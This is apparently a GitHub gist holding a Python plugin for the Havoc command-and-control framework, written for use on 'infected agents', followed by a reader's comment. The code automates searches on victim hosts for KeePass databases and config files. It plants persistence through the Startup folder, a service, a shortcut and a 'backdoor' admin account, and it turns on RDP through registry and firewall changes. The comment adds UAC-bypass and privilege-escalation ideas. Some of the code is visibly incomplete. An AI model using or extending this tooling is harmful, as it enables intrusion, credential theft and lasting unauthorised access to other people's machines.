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Last active July 16, 2024 11:01
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#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Made by papi
# Created on: Di 10 Okt 2023 01:54:42 CEST
# Description:
# A havoc extention to search for files inside of infected agents
# Usage:
# To use this script save it on your machine and add it to the script manager of Havoc
# inside of: Scripts > Scripts Manager > Load Script
import os
import subprocess
from shutil import which
import havocui
import havoc
auto_search = havocui.Widget("Auto Search", True)
auto_recon = havocui.Widget("Auto Recon", True)
auto_persist = havocui.Widget("Auto Persist", True)
auto_GUI = havocui.Widget("Auto rdp", True)
demons = []
# auto search vars
selecte_demon = None
powershell = False
batch = False
text_files = False
exe_files = False
WebConf = False
Keypass = False
# auto persist vars
local_payload_path = "/home/p4p1/payload/demon.x64.exe"
remote_presist_path = "C:\\Windows\\Tasks\\"
shell_custom_path = False
shell_startup = False
backdoor_user = False
lnk_file = False
service_running = False
# auto recon vars
auto_custompowershell = False
auto_custompowershell_cmd = ""
auto_bofbelt = False
auto_password_policy = False
auto_scrot = False
# auto GUI vars
# ... Auto GUI section ...
def set_username_gui(text):
global username
username = text
def set_password_gui(text):
global password
password = text
def set_domain_gui(text):
global domain
domain = text
def set_dynamic_resultion():
global dynamic_resolution
dynamic_resolution = not dynamic_resolution
def set_ssl_security():
global disable_ssl_security
disable_ssl_security = not disable_ssl_security
def set_admin_mode():
global admin_mode_gui
admin_mode_gui = not admin_mode_gui
def set_set_firewall():
global set_firewall_and_task
set_firewall_and_task = not set_firewall_and_task
def open_autogui():
if which("xfreerdp") == None:
auto_GUI.addLabel("<h3 style='color:#ff0000'>You are missing the XFREERDP package please install it to use this functionality</h3>")
auto_GUI.addLabel("<h3 style='color:#bd93f9'>Settings of autordp command</h3>")
auto_GUI.addLabel("<h6 style='color:#ff0000'>[!] means you need admin priv</h6>")
auto_GUI.addLabel("<span style='color:#71e0cb'>username:</span>")
auto_GUI.addLineedit(username, set_username_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>password:</span>")
auto_GUI.addLineedit(password, set_password_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>domain:</span>")
auto_GUI.addLineedit(domain, set_domain_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>options:</span>")
auto_GUI.addCheckbox("dynamic resolution", set_dynamic_resultion, dynamic_resolution)
auto_GUI.addCheckbox("dissable ssl", set_ssl_security, disable_ssl_security)
auto_GUI.addCheckbox("admin mode", set_admin_mode, admin_mode_gui)
auto_GUI.addCheckbox("[!] add firewall rule and activate rdp (remote machine)", set_set_firewall, set_firewall_and_task)
def run_autogui(demonID, *param):
TaskID : str = None
demon : Demon = None
cmd = ""
demon = havoc.Demon(demonID)
if domain != "":
cmd = "bash -c \"yes | xfreerdp /u:%s\\%s /p:%s /v:%s" % (domain, username, password, demon.InternalIP)
cmd = "bash -c \"yes | xfreerdp /u:%s /p:%s /v:%s" % (username, password, demon.InternalIP)
if disable_ssl_security:
cmd += " /tls-seclevel:0"
if dynamic_resolution:
cmd += " /dynamic-resolution"
if admin_mode_gui:
cmd += " /admin"
cmd += "\""
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Running: %s" % cmd )
if set_firewall_and_task:
demon.Command(TaskID, "shell reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f")
demon.Command(TaskID, "shell netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes")
subprocess.Popen(cmd, shell=True)
return TaskID
# ... Auto Search section...
def set_directory(text):
global dir_to_search
dir_to_search = text
def slct_powershell():
global powershell
powershell = not powershell
def slct_batch():
global batch
batch = not batch
def slct_exe():
global exe_files
exe_files = not exe_files
def slct_text():
global text_files
text_files = not text_files
def slct_webconf():
global WebConf
WebConf = not WebConf
def slct_Key():
global Keypass
Keypass = not Keypass
def select_widget(num):
global powershell
global selecte_demon
global demons
if num != 0:
print("help me....")
selecte_demon = havoc.Demon(demons[num - 1])
def run_auto_search():
global powershell
global selecte_demon
global text_files
global WebConf
global Keypass
global batch
global exe_files
global dir_to_search
if selecte_demon is None:
havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.")
TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to Find files" )
if powershell:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.ps1 -Recurse\"" % dir_to_search)
if batch:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.bat -Recurse\"" % dir_to_search)
if text_files:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.txt -Recurse\"" % dir_to_search)
if WebConf:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *web.config -Recurse\"" % dir_to_search)
if Keypass:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.kdbx -Recurse\"" % dir_to_search)
if exe_files:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.exe -Recurse\"" % dir_to_search)
return TaskID
def open_autosearch():
global demons
demons = havoc.GetDemons()
auto_search.addLabel("<h3 style='color:#bd93f9'>Select a demon to search files on</h3>")
auto_search.addCombobox(select_widget, "select demon", *demons)
auto_search.addLabel("<span style='color:#71e0cb'>Folder to start search:</span>")
auto_search.addLineedit(dir_to_search, set_directory)
auto_search.addLabel("<span style='color:#71e0cb'>File types:</span>")
auto_search.addCheckbox("powershell files (*.ps1)", slct_powershell, powershell)
auto_search.addCheckbox("batch files (*.bat)", slct_batch, batch)
auto_search.addCheckbox("text files (*.txt)", slct_text, text_files)
auto_search.addCheckbox("web.config files (*web.config)", slct_webconf, WebConf)
auto_search.addCheckbox("KeePass Database files (*.kdbx)", slct_Key, Keypass)
auto_search.addCheckbox("Executable files (*.exe)", slct_exe, exe_files)
auto_search.addButton("Start search!", run_auto_search)
# ... Auto Persist section ...
def set_payload_path(data):
global local_payload_path
local_payload_path = data
def set_rem_payload_path(data):
global remote_presist_path
remote_presist_path = data
def slct_user_startup():
global shell_startup
shell_startup = not shell_startup
def slct_backdoor_user():
global backdoor_user
backdoor_user = not backdoor_user
def slct_service_running():
global service_running
service_running = not service_running
def slct_lnk_file():
global lnk_file
lnk_file = not lnk_file
def run_persist():
global selecte_demon
global local_payload_path
global shell_startup
if selecte_demon is None:
havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.")
TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to persist itself" )
if shell_startup:
selecte_demon.Command(TaskID, "powershell \"[Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup) | cd\"")
selecte_demon.Command(TaskID, "upload %s" % local_payload_path)
if backdoor_user:
selecte_demon.Command(TaskID, "shell net user backdoor password123 /add")
selecte_demon.Command(TaskID, "shell net localgroup \"Administrators\" backdoor /add")
selecte_demon.Command(TaskID, "shell net localgroup \"Remote Desktop Users\" backdoor /add")
if service_running:
selecte_demon.Command(TaskID, "cd %s" % remote_presist_path)
selecte_demon.Command(TaskID, "upload %s" % local_payload_path)
selecte_demon.Command(TaskID, "shell sc create AutoSuite binPath=\"%s\\demon.x64.exe\" start=auto" % remote_presist_path)
selecte_demon.Command(TaskID, "shell sc start AutoSuite")
if lnk_file:
selecte_demon.Command(TaskID, "powershell (New-Object -ComObject WScript.Shell).CreateShortcut('file.lnk').TargetPath = '%s\\demon.x64.exe';(New-Object -ComObject WScript.Shell).CreateShortcut('file.lnk').Save()" % remote_presist_path)
return TaskID
def open_autopersist():
global demons
demons = havoc.GetDemons()
auto_persist.addLabel("<h3 style='color:#bd93f9'>Select a demon to set persistance on</h3>")
auto_persist.addCombobox(select_widget, "select demon", *demons)
auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on attacking end:</span>")
auto_persist.addLineedit(local_payload_path, set_payload_path)
auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on victim end:</span>")
auto_persist.addLineedit(remote_presist_path, set_rem_payload_path)
auto_persist.addLabel("<span style='color:#71e0cb'>Persistance type:</span>")
auto_persist.addCheckbox("shell:startup", slct_user_startup, shell_startup)
auto_persist.addCheckbox("backdoor user", slct_backdoor_user, backdoor_user)
auto_persist.addCheckbox("backdoor service", slct_service_running, service_running)
auto_persist.addCheckbox("link file in current folder", slct_lnk_file, lnk_file)
auto_persist.addButton("Persist!", run_persist)
# ... Auto recon section ...
def slct_bofbelt():
global auto_bofbelt
auto_bofbelt = not auto_bofbelt
def run_bofbelt(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run bofbelt" )
demon.Command(TaskID, "bofbelt")
def slct_scrot():
global auto_scrot
auto_scrot = not auto_scrot
def run_scrot(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run screenshot" )
demon.Command(TaskID, "screenshot")
def slct_pwpolicy():
global auto_password_policy
auto_password_policy = not auto_password_policy
def run_pwpolicy(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" )
demon.Command(TaskID, "get_password_policy")
def run_custpowershell(identifier):
global auto_custompowershell_cmd
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" )
demon.Command(TaskID, "powershell \"%s\"" % auto_custompowershell_cmd)
def set_powershell(text):
global auto_custompowershell
global auto_custompowershell_cmd
if len(text) > 0:
auto_custompowershell = True
auto_custompowershell_cmd = text
def save_autorecon():
global auto_bofbelt
global auto_password_policy
global auto_scrot
global auto_custompowershell
event = havoc.Event("events")
if auto_bofbelt:
if auto_password_policy:
if auto_scrot:
if auto_custompowershell:
auto_recon.addLabel("<h3 style='color:#bd93f9'>Run commands on new session</h3>")
auto_recon.addLabel("<span style='color:#71e0cb'>Pre-defined commands:</span>")
auto_recon.addCheckbox("bofbelt (seat belt recon tool)", slct_bofbelt, auto_bofbelt)
auto_recon.addCheckbox("get_password_policy", slct_pwpolicy, auto_password_policy)
auto_recon.addCheckbox("screenshot", slct_scrot, auto_scrot)
auto_recon.addLabel("<span style='color:#71e0cb'>Custom powershell command:</span>")
auto_recon.addLineedit("Get-ChildItem...", set_powershell)
auto_recon.addButton("Save", save_autorecon)
def open_autorecon():
if not which("xfreerdp") == None:
havoc.RegisterCommand( run_autogui, "", "autordp", "Connect to the machine using xfreerdp.", 0, "", "" )
havocui.createtab("Auto Suite", "Auto search", open_autosearch, "Auto recon", open_autorecon, "Auto persist", open_autopersist, "Auto rdp", open_autogui)
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hastalamuerte commented Mar 4, 2024

Thanks for answer! Wish a good luck with OSEP. Me too in wait for havoc rewrite.

Seems i was miss attacking/attackers machine - repeat it with selfhosted payload (both methods), receive only Access Denied for User.
(Set-ItemProperty -Path 'HKCU:\Soft.... Still work for User with no Admin or some other privs like selfimpersonate , its win 10 test machine with account on one drive, so i see that many of methods and tool not work on that env) -but maybe that technique deserve to be in

Cause low code, i can just advice some logic that possible may be helpful -
Something like individual trays/chains with checkboxes for 1. New User 2. New Admin 3. Manual .
Payload - Target / Stored / Remote + to add files in chain, for dll sideloading etc .
Output folder .
Elevate/Uac - 1 Technique 2 Path there is havoc script / potatos
And maybe add a option to add commands (like recon, or integrate him), even between steps (yep oneliners is cool , but sometimes syntax broke all) , and not only powershell command on start, like extensions/modules commands - for ex run "uac-bypass elevatedcom file.exe" "dll spawn explorer exe" .

So if rightly setup unpriv and priv chains it might be fully auto c2)
(upd. i found session.Elevated and Session.OS in havoc and Elevated / "Elevated": Agent.Info.Elevated in demons.go, hope it will help to identify privileges on demon initial to understand what commands list send to it) - will try to implement in py (upd. -fail seems havoc dont understand that , or i code wrong. Panel can understand what kind of demon/user it is .. so possible script can.)

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